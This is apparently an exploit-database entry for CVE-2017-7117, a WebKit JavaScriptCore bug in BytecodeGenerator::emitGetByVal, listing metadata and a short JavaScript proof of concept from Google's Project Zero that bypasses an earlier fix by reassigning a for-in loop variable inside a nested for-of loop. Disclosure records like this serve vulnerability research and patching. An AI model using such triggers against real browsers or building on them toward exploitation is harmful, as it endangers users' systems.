WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (2)

Author: Google Security Research
type: dos
platform: multiple
port: 
date_added: 2017-10-04 
date_updated: 2017-10-04 
verified: 1 
codes: CVE-2017-7117 
tags: 
aliases:  
screenshot_url:  
application_url: 

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1319

The following PoC bypasses the fix for the  issue 1263 (https://bugs.chromium.org/p/project-zero/issues/detail?id=1263)

PoC:
-->

function f() {
    let o = {};
    for (let i in {xx: 0}) {
        for (i of [0]) {

        }

        print(o[i]);
    }
}

f();